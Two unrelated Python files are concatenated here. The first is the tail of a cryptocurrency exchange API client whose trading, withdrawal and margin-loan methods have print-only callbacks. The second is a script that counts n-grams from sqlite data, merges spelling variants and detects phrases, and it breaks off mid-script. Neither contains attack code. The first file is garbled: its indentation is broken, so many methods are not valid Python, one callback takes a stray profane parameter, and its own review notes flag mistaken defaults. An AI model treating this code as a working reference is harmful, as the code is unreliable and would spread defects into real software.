    method = FUNCTIONCODE_SELLMARKET
    params = {
        'coin_type': coinType,
        'amount': amount
    }
    callback = self.onSellMarket
    optional = {
        'trade_password': tradePassword,
        'trade_id': tradeId,
        'market': market
    }
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def cancelOrder(self, id_, coinType=COINTYPE_BTC, market='cny'):
    """Cancel an order."""
    method = FUNCTIONCODE_CANCELORDER
    params = {
        'coin_type': coinType,
        'id': id_
    }
    callback = self.onCancelOrder
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getNewDealOrders(self, market='cny'):
    """Query the 10 most recent trades."""
    method = FUNCTIONCODE_GETNEWDEALORDERS
    params = {}
    callback = self.onGetNewDealOrders
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getOrderIdByTradeId(self, tradeId, coinType=COINTYPE_BTC,
                        market='cny'):
    """Look up an order id by trade id."""
    method = FUNCTIONCODE_GETORDERIDBYTRADEID
    params = {
        'coin_type': coinType,
        'trade_id': tradeId
    }
    callback = self.onGetOrderIdByTradeId
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def withdrawCoin(self, withdrawAddress, withdrawAmount,
                 coinType=COINTYPE_BTC, tradePassword='',
                 market='cny', withdrawFee=0.0001):
    """Withdraw coins to an external address.

    Note: ``tradePassword`` is accepted but not forwarded to the request.
    """
    method = FUNCTIONCODE_WITHDRAWCOIN
    params = {
        'coin_type': coinType,
        'withdraw_address': withdrawAddress,
        'withdraw_amount': withdrawAmount
    }
    callback = self.onWithdrawCoin
    optional = {
        'market': market,
        'withdraw_fee': withdrawFee
    }
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def cancelWithdrawCoin(self, id_, market='cny'):
    """Cancel a coin withdrawal."""
    method = FUNCTIONCODE_CANCELWITHDRAWCOIN
    params = {'withdraw_coin_id': id_}
    callback = self.onCancelWithdrawCoin
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def onGetWithdrawCoinResult(self, id_, market='cny'):
    """Query the result of a coin withdrawal.

    NOTE(review): despite the on* name this is a *request* method (the
    matching callback is registered below); renaming would break callers,
    so the misleading name is only flagged here.
    """
    method = FUNCTIONCODE_GETWITHDRAWCOINRESULT
    params = {'withdraw_coin_id': id_}
    callback = self.onGetWithdrawCoinResult
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def transfer(self, amountFrom, amountTo, amount,
             coinType=COINTYPE_BTC ):
    """Transfer funds between accounts."""
    method = FUNCTIONCODE_TRANSFER
    params = {
        'amount_from': amountFrom,
        'amount_to': amountTo,
        'amount': amount,
        'coin_type': coinType
    }
    callback = self.onTransfer
    optional = {}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
    def loan(self, amount, loan_type=LOANTYPE_CNY,
             market='MARKETTYPE_CNY'):
        """Apply for a margin loan.

        NOTE(review): the ``market`` default is the literal string
        'MARKETTYPE_CNY' while sibling methods default to 'cny'; this looks
        like a constant name quoted by mistake -- confirm against the API
        before relying on the default.
        """
        method = FUNCTIONCODE_LOAN
        params = {
            'amount': amount,
            'loan_type': loan_type
        }
        callback = self.onLoan
        optional = {'market': market}
        return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
    def repayment(self, id_, amount, repayAll=0,
                  market='MARKETTYPE_CNY'):
        """Repay a margin loan (set ``repayAll`` to repay in full).

        NOTE(review): the ``market`` default is the literal string
        'MARKETTYPE_CNY', same suspicious quoting as in ``loan`` -- confirm.
        """
        method = FUNCTIONCODE_REPAYMENT
        params = {
            'loan_id': id_,
            'amount': amount
        }
        callback = self.onRepayment
        optional = {
            'repay_all': repayAll,
            'market': market
        }
        return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getLoanAvailable(self, market='cny'):
"""查询杠杆额度"""
method = FUNCTIONCODE_GETLOANAVAILABLE
params = {}
callback = self.onLoanAvailable
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getLoans(self, market='cny'):
"""查询杠杆列表"""
method = FUNCTIONCODE_GETLOANS
params = {}
callback = self.onGetLoans
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
####################################################
## 回调函数
####################################################
#----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print(error, reqID )
#----------------------------------------------------------------------
def onGetAccountInfo(self, data, req, reqID):
"""查询账户回调"""
print(data)
#----------------------------------------------------------------------
def onGetOrders(self, data, req, reqID, fuck):
"""查询委托回调"""
print(data)
#----------------------------------------------------------------------
def onOrderInfo(self, data, req, reqID):
"""委托详情回调"""
print(data)
#----------------------------------------------------------------------
def onBuy(self, data, req, reqID):
"""买入回调"""
print(data)
#----------------------------------------------------------------------
def onSell(self, data, req, reqID):
"""卖出回调"""
print(data)
#----------------------------------------------------------------------
def onBuyMarket(self, data, req, reqID):
"""市价买入回调"""
print(data)
#----------------------------------------------------------------------
def onSellMarket(self, data, req, reqID):
"""市价卖出回调"""
print(data)
#----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回调"""
print(data)
#----------------------------------------------------------------------
def onGetNewDealOrders(self, data, req, reqID):
"""查询最新成交回调"""
print(data)
#----------------------------------------------------------------------
def onGetOrderIdByTradeId(self, data, req, reqID):
"""通过成交编号查询委托编号回调"""
print(data)
#----------------------------------------------------------------------
def onWithdrawCoin(self, data, req, reqID):
"""提币回调"""
print(data)
#----------------------------------------------------------------------
def onCancelWithdrawCoin(self, data, req, reqID):
"""取消提币回调"""
print(data)
#----------------------------------------------------------------------
def onGetWithdrawCoinResult(self, data, req, reqID):
"""查询提币结果回调"""
print(data)
#----------------------------------------------------------------------
def onTransfer(self, data, req, reqID):
"""转账回调"""
print(data)
#----------------------------------------------------------------------
def onLoan(self, data, req, reqID):
"""申请杠杆回调"""
print(data)
#----------------------------------------------------------------------
def onRepayment(self, data, req, reqID):
"""归还杠杆回调"""
print(data)
#----------------------------------------------------------------------
def onLoanAvailable(self, data, req, reqID):
"""查询杠杆额度回调"""
print(data)
#----------------------------------------------------------------------
def onGetLoans(self, data, req, reqID):
"""查询杠杆列表"""
print(data)
# |
analyse_terms.py | #########################################################################################################################################
# IMPORTS ###############################################################################################################################
from collections import Counter
import os,sys
import re, regex
import csv
import itertools
import functools
import operator
from copy import deepcopy as copy
import sqlite3
import numpy as np
from scipy.sparse import csr_matrix as csr
from scipy.sparse.csgraph import connected_components
from langdetect import detect
import multiprocessing as MP
import time
import math
#########################################################################################################################################
# GLOBAL OBJECTS ########################################################################################################################
# CLI: argv[1] = folder of input sqlite DBs, argv[2] = output phrase file,
# argv[3] = output spelling-transition file, argv[4] = output split-model file.
infolder = sys.argv[1];
#freqDB = sys.argv[2];
phrfile = sys.argv[2];
trafile = sys.argv[3];
modfile = sys.argv[4];
# Indices into the [count, subtree, probability] node triples used by make_tree.
CNT = 0; TRE = 1; PRO = 2;
# Language codes langdetect may return (None = detection failed).
_langs = ['af','ar','bg','bn','ca','cs','cy','da','de','el','en','es','et','fa','fi','fr','gu','he','hi','hr','hu','id','it','ja','kn','ko','lt','lv',
          'mk','ml','mr','ne','nl','no','pa','pl','pt','ro','ru','sk','sl','so','sq','sv','sw','ta','te','th','tl','tr','uk','ur','vi','zh-cn','zh-tw',None];
_max_len_ = 4;      # max representative strings per line (used only in the commented-out tail)
_n_ = 3;            # count 1..(_n_-1)-grams, i.e. unigrams and bigrams
_jobs = 64;         # worker processes for n-gram counting
_jobs2 = 64;        # worker processes for similarity scoring
_batch = 10000;     # rows fetched per sqlite batch
_batch2 = 10000;    # comparison tasks per similarity batch
WORD = re.compile(r'(\b[^\s]+\b)');
CHAR = re.compile(r'([A-Za-z]|ß|ö|ü|ä)+');
LEGAL = regex.compile(r'\p{L}+')
#########################################################################################################################################
# FUNCTIONS #############################################################################################################################
def ngrams(seq,n):
    """Return all contiguous n-grams of seq as tuples (empty if len(seq) < n)."""
    grams = []
    for end in range(n, len(seq) + 1):
        grams.append(tuple(seq[end - n:end]))
    return grams
def probs_leq(p,c,tree):
    """All (w, w_) bigram pairs with conditional probability P(w_|w) >= p
    whose head token has probability P(w) >= c."""
    pairs = []
    for w in tree:
        if tree[w][PRO] < c:
            continue
        for w_ in tree[w][TRE]:
            if tree[w][TRE][w_][PRO] >= p:
                pairs.append((w, w_))
    return pairs
def make_tree(d):
    """Build a depth-2 probability tree from an n-gram Counter.

    ``d`` maps n-gram tuples to frequencies; only the 2-grams contribute.
    Each node is a [count, subtree, probability] triple indexed by the
    module-level CNT/TRE/PRO constants.  Root probabilities are counts over
    the root total; child probabilities are conditional on the parent.
    """
    tree = dict();
    for ngram in d:
        if len(ngram) == 2:
            if ngram[0] in tree:
                tree[ngram[0]][CNT] += d[ngram];
                if ngram[1] in tree[ngram[0]][TRE]:
                    tree[ngram[0]][TRE][ngram[1]][CNT] += d[ngram];
                else:
                    tree[ngram[0]][TRE][ngram[1]] = [d[ngram],dict(),0];
            else:
                tree[ngram[0]] = [d[ngram],{ngram[1]:[d[ngram],dict(),0]},0];
    # Normalize: P(w) over all heads, P(w_|w) within each head's subtree.
    divisor = float(sum([tree[w][CNT] for w in tree]));
    for w in tree:
        tree[w][PRO] = tree[w][CNT] / divisor;
        for w_ in tree[w][TRE]:
            tree[w][TRE][w_][PRO] = float(tree[w][TRE][w_][CNT]) / tree[w][CNT];
    return tree;
def make_tree_(d):
    """Build an arbitrary-depth count trie from an n-gram dict, then annotate
    every node with its conditional probability via add_probs.

    Node layout is [count, children-dict, probability]; the root carries the
    grand total and probability 1.
    """
    tree = [0,dict(),1];
    for ngram in d:
        freq = d[ngram];
        current = tree;
        current[0] += freq;
        for term in ngram:
            if not term in current[1]:
                current[1][term] = [0,dict(),None];
            current[1][term][0] += d[ngram];
            current = current[1][term];
        current = tree;
    add_probs(tree[1],tree[0]);
    return tree;
def add_probs(children,count):
    """Recursively set node[2] = node_count / parent_count for every node of a
    {token: [count, children, prob]} trie level."""
    for node in children.values():
        node[2] = node[0] / count
        add_probs(node[1], node[0])
def get_entropy(path,children):
    """Recursively print the branching entropy at every node of the trie."""
    for token in children:
        subpath = path + [token]
        node = children[token]
        branch_entropy = entropy([node[1][key][2] for key in node[1]])
        print(subpath, branch_entropy)
        get_entropy(subpath, node[1])
def get_splits(path,children,D,concat,thr,power):
    """Walk an affix trie and record split points driven by branching entropy.

    A node's entropy, normalized by len(child)**power, decides whether the
    child is concatenated onto the previous path segment (score above ``thr``
    means do NOT split) or starts a new segment.  For every path of length
    >= 2, ``D`` receives joined-path -> list of cumulative prefixes.
    """
    for child in children:
        H = entropy([children[child][1][node][2] for node in children[child][1]]);
        score = H / len(child)**power; # If normalized entropy is above the threshold then we do NOT split
        path_ = path[:-1]+[path[-1]+child] if len(path)>=1 and concat else path+[child];
        if score > 0: print(path_,score);
        get_splits(path_,children[child][1],D,score>thr,thr,power);
        if len(path_) >= 2:
            options = [''.join(path_[:i+1]) for i in range(len(path_))]
            D[''.join(path_)] = options;
def combine_counters(counters):
    """Merge an iterable of Counters into a single Counter, logging progress
    every 50 inputs."""
    total = Counter()
    for i, counter in enumerate(counters, start=1):
        if i % 50 == 0:
            print(i)
        total.update(counter)
    return total
def display(p,c,tree,inversed=False):
    """Print every bigram selected by probs_leq(p, c, tree); '(inv)' rows
    show the pair reversed (for trees built from reversed n-grams)."""
    for w, w_ in probs_leq(p, c, tree):
        stats = (tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO])
        if inversed:
            print('(inv)', w_, w, stats[0], stats[1], stats[2])
        else:
            print('(std)', w, w_, stats[0], stats[1], stats[2])
def transitive_closure(M): # WARNING: Not for large M!
    """Dense-style closure: boolean CSR matrix that is True wherever two
    nodes lie in the same connected component of M."""
    component_of = connected_components(M)[1]
    return csr(component_of == component_of[:, None])
def term_transitions(replace,DIST='damerau'):
    """Build a probabilistic transition table between spelling variants.

    Links every term pair in ``replace`` into undirected connected
    components; within each component, every term gets normalized transition
    weights to itself and to the component's most frequent member, weighted
    by global unigram frequency and string similarity.

    NOTE(review): reads the module-global Counter ``d`` -- only usable after
    the counting phase has populated it.
    """
    index2term = list(set([item for item in replace.keys()]) | set([item for item in replace.values()]));
    term2index = {index2term[i]:i for i in range(len(index2term))};
    # Symmetric adjacency over the replace pairs.
    rows, cols = zip(*[[term2index[item[0]],term2index[item[1]]] for item in replace.items()]);
    R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));
    labels = connected_components(R)[1];
    sorting = np.argsort(labels);
    labels_s = labels[sorting];
    _, starts = np.unique(labels_s,return_index=True);
    sizes = np.diff(starts);
    # Only components with at least two members matter.
    groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];
    transition = dict();
    for group in groups:
        sum_group = float(sum([d[(index2term[index],)] for index in group]));
        # Representative = most frequent member of the component.
        max_index = None;
        max_freq = 0;
        for index in group:
            predict_term = index2term[index];
            predict_freq = d[(predict_term,)];
            if predict_freq > max_freq:
                max_freq = predict_freq;
                max_index = index;
        for index1 in group:
            given_term = index2term[index1];
            len_1 = len(given_term);
            transition[given_term] = dict();
            for index2 in [index1,max_index]:
                predict_term = index2term[index2];
                len_2 = len(predict_term);
                sim_prefix = prefix_normed( given_term,predict_term,len_1,len_2 );
                sim_similar = similarity_normed( given_term,predict_term,len_1,len_2,DIST );
                transition[given_term][predict_term] = (d[(predict_term,)]/sum_group) * sim_similar;#(sim_similar+sim_prefix)/2;
            # Normalize the (at most two) outgoing weights to sum to 1.
            sum_sim = sum([transition[given_term][predict_term] for predict_term in transition[given_term]]);
            for predict_term in transition[given_term]:
                transition[given_term][predict_term] /= sum_sim;
            for index2 in [index1,max_index]:
                print(given_term, '-->', index2term[index2], transition[given_term][index2term[index2]]);
    return transition;
def apply_replace(index2term,replacements):
    """Resolve pairwise merge candidates into a term -> representative map.

    ``replacements`` holds (i, j, score) index pairs; terms are linked into
    connected components and every non-representative member maps to the
    component's most frequent term (frequency taken from the module-global
    Counter ``d``).
    """
    if len(replacements) == 0:
        return dict();
    term2index = {index2term[i]:i for i in range(len(index2term))};
    rows,cols,sims = zip(*replacements);
    R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));
    labels = connected_components(R)[1];
    sorting = np.argsort(labels);
    labels_s = labels[sorting];
    _, starts = np.unique(labels_s,return_index=True);
    sizes = np.diff(starts);
    groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];
    replace = dict();
    for group in groups:
        terms = [index2term[i] for i in group];
        # Most frequent term wins; ties break on the lexicographically larger term.
        repre = max([(d[(term,)],term) for term in terms])[1];
        for term in terms:
            if term != repre:
                replace[term] = repre;
    return replace;
def replace_by_prefix(index2term,threshold,window):
    """Collect merge candidates (j, i, score) among sorted terms whose
    prefix similarity within a lookahead window exceeds ``threshold``."""
    found = set()
    for i in range(len(index2term) - window):
        base = index2term[i]
        base_len = len(base)
        for offset in range(1, window + 1):
            other = index2term[i + offset]
            score = prefix_normed(base, other, base_len, len(other))
            if score > threshold:
                found.add((i + offset, i, score,))
    return found
def replace_by_similar_(index2term,threshold,window,DIST):
    """Single-process variant of replace_by_similar: collect (j, i, score)
    candidates whose edit/Damerau similarity exceeds ``threshold``."""
    found = set()
    for i in range(len(index2term) - window):
        base = index2term[i]
        base_len = len(base)
        for offset in range(1, window + 1):
            other = index2term[i + offset]
            score = similarity_normed(base, other, base_len, len(other), DIST)
            if score > threshold:
                found.add((i + offset, i, score,))
    return found
def replace_by_similar(index2term,threshold,window,DIST,compared):
    """Parallel similarity scan over a sorted term list.

    Builds batches of (j, i, term_i, term_j, len_i, len_j, threshold, DIST)
    comparison tasks -- skipping pairs already in ``compared`` so repeated
    passes of the outer merge loop do not rescore them -- and fans them out
    to _jobs2 worker processes running get_similarity_normed.  Returns the
    union of candidate sets plus the updated ``compared`` memo.
    """
    replacements = set([]);
    manager = MP.Manager();
    tasks = manager.Queue();
    results = manager.Queue();
    T = [];
    for i in range(len(index2term)-window):
        T += [(i+j,i,index2term[i],index2term[i+j],len(index2term[i]),len(index2term[i+j]),threshold,DIST,) for j in range(1,window+1) if not (index2term[i+j],index2term[i],) in compared];
        if len(T) > _batch2:
            # Remember every pair in the flushed batch as compared.
            compared |= set([(index2term[ij],index2term[i],) for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T]);
            tasks.put(T);
            T = [];
    if len(T) != 0:
        tasks.put(T);
    workers = [MP.Process(target=get_similarity_normed,args=(tasks,results,x,)) for x in range(_jobs2)];
    for worker in workers:
        worker.start();
    # One result set per worker, produced when its task queue times out.
    for x in range(_jobs2):
        result = results.get();
        replacements |= result;
        #print 'Got result', x;
    for x in range(len(workers)):
        workers[x].join();
        #print 'Joined worker', x;
    return replacements, compared;
def get_similarity_normed(tasks,results,x):
    """Worker process: score queued comparison batches and emit candidates.

    Drains ``tasks`` until a 3-second timeout (the bare except doubles as
    the queue.Empty handler -- NOTE(review): it also swallows any other
    error, silently ending the worker), collecting (j, i, score) tuples
    above threshold, then puts the accumulated set on ``results`` once.
    """
    replacements = set([]);
    while True:
        print(x,'says: Approximate number of jobs in queue:', tasks.qsize());
        try:
            T = tasks.get(timeout=3);
            #print x,'says: Got', len(T), 'tasks to do...';
        except:
            break;
        for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T:
            percent = similarity_normed(term_i,term_ij,len_1,len_2,DIST);
            if percent > threshold:
                replacements.add((ij,i,percent,));
        #print x,'says: Done with this set of tasks.';
    #print 'Closing job', x;
    results.put(replacements);
    return 0;
def prefix_normed(term1,term2,len_1,len_2):
    """Common-prefix length normalized by the longer term, but only when the
    shorter term is itself a prefix of the longer one; otherwise 0.0."""
    common = os.path.commonprefix([term1, term2])
    if len(common) == min(len_1, len_2):
        return float(len(common)) / max(len_1, len_2)
    return 0.0
def is_prefix(term1,term2):
    """True iff term1 is a prefix of term2 (works for any sliceable sequence)."""
    return term2[:len(term1)] == term1
def make_affixes(terms):
    """Greedy affix segmentation of a sorted term list.

    Each term reuses the leading segments of its predecessor's segmentation
    for as long as they remain prefixes of the current term (and the reuse
    counter stays under 10000); the unmatched remainder starts a new affix.
    Returns {term: [(affix, reuse_count), ...]}.
    """
    prefixed = {terms[0]:[(terms[0],0,)]};
    for i in range(len(terms)-1):
        affixes = [];
        pointer = 0;
        for prefix,interval in prefixed[terms[i]]:
            if len(prefix) >= 2 and interval < 10000 and is_prefix(prefix,terms[i+1][pointer:]): # reusing previous prefix
                affixes += [(prefix,interval+1,)];
                pointer += len(prefix);
            else:
                break;
        affixes += [(terms[i+1][pointer:],0,)]; # new prefix
        prefixed[terms[i+1]] = affixes;
    return prefixed;
def similarity_normed(term1,term2,len_1,len_2,DIST):
    """Similarity in [0, 1]: 1 - distance/max_len, using the Damerau (OSA)
    distance when DIST == 'damerau', plain Levenshtein otherwise."""
    if DIST == 'damerau':
        dist = damerau_dist(term1, term2)
    else:
        dist = edit_dist(term1, term2)
    return 1. - (float(dist) / max(len_1, len_2))
def edit_dist(s1,s2):
    """Levenshtein distance via a single-row dynamic program (O(len1*len2)
    time, O(min_len) space)."""
    if len(s1) > len(s2):
        s1, s2 = s2, s1
    prev = list(range(len(s1) + 1))
    for j, cj in enumerate(s2):
        cur = [j + 1]
        for i, ci in enumerate(s1):
            if ci == cj:
                cur.append(prev[i])
            else:
                cur.append(1 + min(prev[i], prev[i + 1], cur[-1]))
        prev = cur
    return prev[-1]
def damerau_dist(s1,s2):
    """Optimal-string-alignment (restricted Damerau-Levenshtein) distance:
    Levenshtein plus adjacent-character transpositions at cost 1.

    Row-rolling DP where each row stores its left-border value at index -1
    (Python negative indexing is used deliberately via ``thisrow[y-1]`` and
    the trailing element of the initial rows) -- do not "simplify" the
    indexing.  NOTE(review): relies on that border layout for the final
    thisrow[len(s2)-1] lookup; confirm edge cases before reusing elsewhere.
    """
    oneago = None;
    thisrow = list(range(1,len(s2)+1))+[0];
    for x in range(len(s1)):
        twoago, oneago, thisrow = oneago, thisrow, [0]*len(s2)+[x + 1];
        for y in range(len(s2)):
            delcost = oneago[y] + 1;
            addcost = thisrow[y-1] + 1;
            subcost = oneago[y-1] + (s1[x]!=s2[y]);
            thisrow[y] = min(delcost,addcost,subcost);
            # Transposition of adjacent characters.
            if (x>0 and y>0 and s1[x]==s2[y-1] and s1[x-1]==s2[y] and s1[x]!=s2[y]):
                thisrow[y] = min(thisrow[y],twoago[y-2]+1);
    return thisrow[len(s2)-1];
def all_partitions(seq):
    """Yield every way of cutting seq into contiguous, order-preserving
    pieces.  Each of the len(seq)-1 gaps is cut or not, encoded in the bits
    of the mask, giving 2**(len(seq)-1) partitions in mask order."""
    n = len(seq)
    for mask in range(1 << (n - 1)):
        parts = []
        start = 0
        for gap in range(n - 1):
            if mask & (1 << gap):
                parts.append(seq[start:gap + 1])
                start = gap + 1
        parts.append(seq[start:])
        yield parts
def conflate(affixes,d,tree):
    """Pick the best way to join an affix sequence into larger units.

    Scores each contiguous partitioning by sum(freq(part)**len(part)) over
    ``d`` divided by the product of -log transition probabilities between
    adjacent parts in ``tree``; returns the joined parts of the best-scoring
    partitioning, or None if no partitioning scores above 0.
    """
    max_score = 0;
    max_part = None;
    for partitioning in all_partitions(affixes):
        summ = 0;
        prob = 1;
        for j in range(len(partitioning)):
            affix = ''.join(partitioning[j]);
            prob *= -np.log(tree[partitioning[j][-1]][1][partitioning[j+1][0]][2]) if j+1 < len(partitioning) else 1;#tree[partitioning[j][-1]][2];
            summ += d[(affix,)]**len(affix);
        score = summ / prob;
        if score > max_score:
            max_score = score;
            max_part = [''.join(partition) for partition in partitioning];
    return max_part;
def replace_in_d(d,replace,threshold):
    """Rewrite every n-gram in Counter ``d`` by applying the ``replace`` map
    to terms whose relative frequency is below ``threshold``, summing the
    counts of n-grams that collapse onto each other.

    NOTE(review): ``d[term]`` looks a *string* up in a Counter keyed by
    *tuples*, so it always yields 0 and the frequency test is vacuously true
    for any threshold > 0 -- probably meant ``d[(term,)]``.  Confirm before
    relying on the threshold (call sites currently pass 1.0 or are
    commented out).
    """
    denom = float(sum([d[key] for key in d]));
    d_ = Counter();
    for tup in d:
        d_[tuple([replace[term] if term in replace and d[term]/denom < threshold else term for term in tup])] += d[tup];
    return d_;
def add_in_d(d,transition):
    """Redistribute n-gram mass over spelling variants.

    Every term of every n-gram is expanded into its weighted ``transition``
    targets (terms without transitions keep themselves with weight 1); each
    resulting n-gram gets the product of the term weights times the original
    count.  N-grams not produced by any expansion keep their original count.
    """
    new_d = dict();
    for tup in d:
        options = [els for els in itertools.product(*[[(term2,transition[term1][term2],) for term2 in transition[term1]] if term1 in transition else [(term1,1.,)] for term1 in tup])]
        for option in options:
            tup_, weights = zip(*option);
            new_d[tup_] = functools.reduce(operator.mul,weights,1)*d[tup];
    # Keep originals where no expansion produced a replacement entry.
    d_ = {tup:new_d[tup] if tup in new_d else d[tup] for tup in set(d.keys())|set(new_d.keys())};
    return d_;
def build_counts(Q,R,x,):
    """Worker process: count n-grams (forward and reversed) per language.

    Pulls row batches from ``Q`` until a 3s timeout, tokenizes the first
    column with WORD, detects the title's language with langdetect (None on
    failure), and counts 1..(_n_-1)-grams into global and per-language
    Counters.  Partial results are flushed to ``R`` whenever the global
    Counter exceeds 100000 entries, and once more on shutdown.

    NOTE(review): ``dl[lang]`` assumes every detect() result is a key of
    the _langs-based dicts -- a code outside _langs would raise KeyError;
    confirm langdetect's possible outputs match _langs.
    """
    print('started', x);
    d, d_inv, dl, dl_inv = Counter(), Counter(), {lang:Counter() for lang in _langs}, {lang:Counter() for lang in _langs};
    while True:
        print(x,'says: Approximate number of jobs in queue:', Q.qsize());
        try:
            rows = Q.get(timeout=3);
        except:
            break;
        titles = [[term.strip().lower() for term in re.findall(WORD,row[0])] for row in rows if not row[0]==None];
        for title in titles:
            if len(title)==0: continue;
            titstr = ' '.join(title).strip();
            lang = None;
            try:
                lang = detect(titstr);
            except:
                print(titstr);
            for n in range(1,_n_):
                for ngram in ngrams(title,n):
                    zgram = tuple(reversed(ngram));
                    d[ngram] += 1;
                    d_inv[zgram] += 1;
                    dl[lang][ngram] += 1;
                    dl_inv[lang][zgram] += 1;
        if len(d) > 100000:
            R.put((d,d_inv,dl,dl_inv,));
            d, d_inv, dl, dl_inv = Counter(), Counter(), {lang:Counter() for lang in _langs}, {lang:Counter() for lang in _langs};
    print('Closing job', x);
    R.put((d,d_inv,dl,dl_inv,));
    return 0;
def feed(Q,infolder):
    """Feeder process: stream row batches from every sqlite DB in
    ``infolder`` into the shared queue ``Q``.

    Selects the concatenation of columns c1..c4 from each DB's
    ``representations`` table, fetching _batch rows at a time, and applies
    backpressure by sleeping while more than 1000 batches are queued.
    """
    for inDB in os.listdir(infolder):
        print(infolder+inDB);
        con_title = sqlite3.connect(infolder+inDB);
        cur_title = con_title.cursor();
        cur_title.execute("SELECT c1 || ' ' || c2 || ' ' || c3 || ' ' || c4 FROM representations");
        i = 0;
        while True:
            i += 1; print(i*_batch);
            rows = cur_title.fetchmany(_batch);
            if len(rows) == 0:
                break;
            Q.put(rows);#Q.put(row[0]);
            while Q.qsize() > 1000:
                time.sleep(1);
        con_title.close();
    return 0;
def entropy(dist):
    """Shannon entropy (in bits) of a probability distribution.

    BUGFIX: zero-probability entries are now skipped instead of raising a
    math domain error from log(0); the limit of p*log2(p) as p -> 0 is 0,
    so results for strictly positive inputs are unchanged.
    """
    return -sum([prob*math.log(prob,2) for prob in dist if prob > 0]);
#########################################################################################################################################
# SCRIPT ##########ä#####################################################################################################################
# Phase 1: parallel n-gram counting.  One feeder streams row batches from the
# sqlite DBs into Q; _jobs workers build per-language n-gram Counters and push
# partial results onto R, which are then merged into the global Counters.
manager = MP.Manager();
Q = manager.Queue();
R = manager.Queue();
feeder = MP.Process(target=feed,args=(Q,infolder,));
workers = [MP.Process(target=build_counts,args=(Q,R,x,)) for x in range(_jobs)];
feeder.start(); time.sleep(5);
for worker in workers:
    worker.start();
feeder.join();
for x in range(len(workers)):
    workers[x].join();
    print('Joined worker', x);
counts = [];
while not R.empty():
    result = R.get();
    counts.append(result);
print('Combining results');print(1);
d = combine_counters((counts[x][0] for x in range(len(counts))));#sum((counts[x][0] for x in range(len(counts))),Counter());print(2);
d_inv = combine_counters((counts[x][1] for x in range(len(counts))));
dl = {lang: combine_counters((counts[x][2][lang] if lang in counts[x][2] else Counter() for x in range(len(counts)))) for lang in _langs}
dl_inv = {lang: combine_counters((counts[x][3][lang] if lang in counts[x][3] else Counter() for x in range(len(counts)))) for lang in _langs}
print('Done combining results.');
#input('Press Enter to continue...');
#########################################################################################################################################
# Phase 2: iterative spelling normalization.  Repeatedly merge terms that are
# near-duplicates (by common prefix and by Damerau/edit similarity) until no
# merge applies, then redistribute the n-gram mass over the merge targets.
_threshold_prefix = 0.75#0.8; #TODO: These thresholds might be different for each typ
_window_prefix = 1;
_threshold_similar = 0.8#.875; #TODO: Try out what are the best ones for each type!
_window_similar = 20;
_distance = 'damerau'; #'edit'
terms = sorted([gram[0] for gram in d if len(gram)==1]);
index2term = copy(terms);
term2index = {terms[i]:i for i in range(len(terms))};
term2index_ = copy(term2index);
replace = dict();
sim_prefix = dict();
sim_similar = dict();
num_replace = 99;  # sentinel > 0 so the loop runs at least once
compared = set();
while num_replace > 0:
    print(1);
    replace_prefix = replace_by_prefix( terms,_threshold_prefix,_window_prefix);
    print(2);
    replace_similar, compared = replace_by_similar(terms,_threshold_similar,_window_similar,_distance,compared);
    #replace_edit = replace_by_similar(terms,_threshold_similar,_window_similar,'edit');
    print(3);
    replace_new = apply_replace(terms,replace_prefix|replace_similar);
    print(4);
    num_replace = len(replace_new);
    print(5);
    only_prefix = [(terms[pair[0]],terms[pair[1]],) for pair in replace_prefix-replace_similar];
    #only_damerau = [(terms[pair[0]],terms[pair[1]],) for pair in replace_similar-replace_edit];
    print(6);
    replace.update(replace_new);
    print(7);
    # Collapse the vocabulary onto the representatives and re-sort for the next pass.
    terms = sorted(list(set([replace[term] if term in replace else term for term in terms])));
    print(8);
    term2index_ = {terms[i]:i for i in range(len(terms))};
    print(num_replace, '(',len(only_prefix),len(compared),')');#, '(',len(only_damerau),')';
transition = term_transitions(replace);
_replace_thr = 1.;#0.00001; The frequency of the replaced item is in no way indicative of wether the replace makes sense or not.
d = add_in_d(d ,transition);#replace_in_d(d, replace,_replace_thr);
d_inv = add_in_d(d_inv,transition);#replace_in_d(d_inv,replace,_replace_thr);
#########################################################################################################################################
# Phase 3: build forward and reversed bigram probability trees over the
# normalized counts and print high-probability transitions for inspection.
tree = make_tree(d);
tree_inv = make_tree(d_inv);
display(1,10,tree);
display(1,10,tree_inv,True);
#########################################################################################################################################
# Phase 4: phrase detection.  A bigram is kept when it is strongly predictive
# in BOTH directions (inter), or deterministic in one direction and likely in
# the other (inter_ / inter__); the union is written to the phrase file.
_and_p_ = 0.0005#0.5#0.6;
_and_c_ = 0.000000001#0.0001;
_or_p_ = 0.0003#0.3#0.4;
_or_c_ = 0.000000001#0.0001;
#-------------------------------------------------------------------------------------
#-right-min-left-min------------------------------------------------------------------
set_std = set(probs_leq(_and_p_,_and_c_,tree));
set_inv = set([tuple(reversed(el)) for el in probs_leq(_and_p_,_and_c_,tree_inv)]);
inter = set_std & set_inv;
#-------------------------------------------------------------------------------------
#-right-certain-left-min--------------------------------------------------------------
set_std_ = set(probs_leq(1.0,_or_c_,tree));
set_inv_ = set([tuple(reversed(el)) for el in probs_leq(_or_p_,_or_c_,tree_inv)]);
